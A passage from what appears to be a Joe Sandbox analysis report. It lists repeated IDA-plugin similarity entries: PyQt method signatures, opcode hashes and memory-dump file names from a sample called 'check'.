                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?swap@Region@@V1@@
                                                                                                                                                                                                                • String ID: BJ9$QRawFont$swap$swap(self, other: QRawFont)
                                                                                                                                                                                                                • API String ID: 2712419754-2130710366
                                                                                                                                                                                                                • Opcode ID: 8979dcb898a7b2ae65847d493f0592479a1a7b820e8141cfb89827695325043b
                                                                                                                                                                                                                • Instruction ID: 608a213b909f6d65da252285bb769d8af4c5708a43dfc7b970950b1360d7f24f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8979dcb898a7b2ae65847d493f0592479a1a7b820e8141cfb89827695325043b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 511118B5A18F46C1EB10DF24E8886A933A8FB48B84F9141B2CA5D03320DF3DD959C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?setBool_Enabled@FromGrabKeyboardLongWindow@@
                                                                                                                                                                                                                • String ID: QWindow$setKeyboardGrabEnabled$setKeyboardGrabEnabled(self, grab: bool) -> bool
                                                                                                                                                                                                                • API String ID: 1802758380-1671088457
                                                                                                                                                                                                                • Opcode ID: 13961945c7752c22cae0dd617f93030b5996f14be50006fb7f048977731f9253
                                                                                                                                                                                                                • Instruction ID: 31719fbdf6f4ac14485b12da7de93cabbdbafe9bbae0652e3560258fe87c63a9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 13961945c7752c22cae0dd617f93030b5996f14be50006fb7f048977731f9253
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B5114CB5A18E56D1EB10DF34E8886A837B9FB45B45FA140B6CA9D03320DF3DD94AC700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Bool_CursorFromLayout@@LongPosition@TextValid
                                                                                                                                                                                                                • String ID: QTextLayout$isValidCursorPosition$isValidCursorPosition(self, pos: int) -> bool
                                                                                                                                                                                                                • API String ID: 2290150148-3369415377
                                                                                                                                                                                                                • Opcode ID: 3e011c9a74787a2205623a2db3002ffedc5a63a971083a772c786d9ef84aa39a
                                                                                                                                                                                                                • Instruction ID: 6f8e96f8d106ec6caef1b723ff9d0790f64f9bf2eac409810541b3703067c681
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3e011c9a74787a2205623a2db3002ffedc5a63a971083a772c786d9ef84aa39a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F00129B5A18E56D1EB10DF21E8886A933A9FB44B44FA14172CA5C43320CF3DD95AC740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?angleDoubleFloat_FromPainterPath@@Percent@
                                                                                                                                                                                                                • String ID: QPainterPath$angleAtPercent$angleAtPercent(self, t: float) -> float
                                                                                                                                                                                                                • API String ID: 204213175-2269684387
                                                                                                                                                                                                                • Opcode ID: 8adbd1c432bc2626309877ce92734a9291468099230f2ccade5138f8b2e45e72
                                                                                                                                                                                                                • Instruction ID: 7697462798ec1eb88df1b976785e13fb936c7a8938d220bb6b28a15bf9fb2c31
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8adbd1c432bc2626309877ce92734a9291468099230f2ccade5138f8b2e45e72
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A30140B1A18E46C2EB11DF30E8886A933B8FB54B44FA14076CA5C43320DF3DD98AC740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?slopeDoubleFloat_FromPainterPath@@Percent@
                                                                                                                                                                                                                • String ID: QPainterPath$slopeAtPercent$slopeAtPercent(self, t: float) -> float
                                                                                                                                                                                                                • API String ID: 1007492032-3960587637
                                                                                                                                                                                                                • Opcode ID: 1535b535a3df342ef32397d0a4ff477161ba16411e68eee956240f3ffdd4b9c3
                                                                                                                                                                                                                • Instruction ID: 87ef59076abd2ece34d7f6495effaff5fff704897cf83bff998f2e36dad106eb
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1535b535a3df342ef32397d0a4ff477161ba16411e68eee956240f3ffdd4b9c3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 070129B6A18E46C5EB11DF30E8886A933A8FB54B54FA140B6CA5C43320DF7DD99AC740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?intFormat@@FromLongLong_Property@Text
                                                                                                                                                                                                                • String ID: QTextImageFormat$quality$quality(self) -> int
                                                                                                                                                                                                                • API String ID: 1809571791-639887700
                                                                                                                                                                                                                • Opcode ID: 83b7c6af291b6bec72a0417fd8d950562b69cffc2d440985d49a830bd2f046be
                                                                                                                                                                                                                • Instruction ID: 5598ce1fee4a568b96a35f6b06db1d927d9602b65dcd372f5ba2e734e645fc8a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 83b7c6af291b6bec72a0417fd8d950562b69cffc2d440985d49a830bd2f046be
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8A011AB5B08B4AC1EB108F71E8886A937A8FB94784F9180B2CE4D43320DF7DD559C780
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?minimumFromLongLong_Size@Size@@Window@@
                                                                                                                                                                                                                • String ID: QWindow$minimumWidth$minimumWidth(self) -> int
                                                                                                                                                                                                                • API String ID: 430898146-2091606642
                                                                                                                                                                                                                • Opcode ID: 330c84295b4ab0bc12ebc684f1068d8838cbf923b43149be572c015c2bef537c
                                                                                                                                                                                                                • Instruction ID: 1afa59ca8fd1cdad31002483c08a9ea0c52cc8ab0f970b7faecff9193a93b9d3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 330c84295b4ab0bc12ebc684f1068d8838cbf923b43149be572c015c2bef537c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 60010CB5A18B5AC1EB50CF25E8486A933A8FB95B84FA140B6DA5D03320DF7CE549C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?intFormat@@FromLongLong_Property@Text
                                                                                                                                                                                                                • String ID: QTextBlockFormat$headingLevel$headingLevel(self) -> int
                                                                                                                                                                                                                • API String ID: 1809571791-2915963898
                                                                                                                                                                                                                • Opcode ID: 9ef99c480ce6dd7319c0b5367f0a62910f3ed89ad803e8426da58bd1a3d40804
                                                                                                                                                                                                                • Instruction ID: 058487c816aba06320451bf9181fd8b4d78fedc47ec7aaa8376743e6d83a00b1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9ef99c480ce6dd7319c0b5367f0a62910f3ed89ad803e8426da58bd1a3d40804
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9A011AB5B08B8AC1EB508F70E8486A937A8FB54B44F9181B6CA4D43320DFBDD659C780
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?boolBool_Format@@FromLongProperty@Text
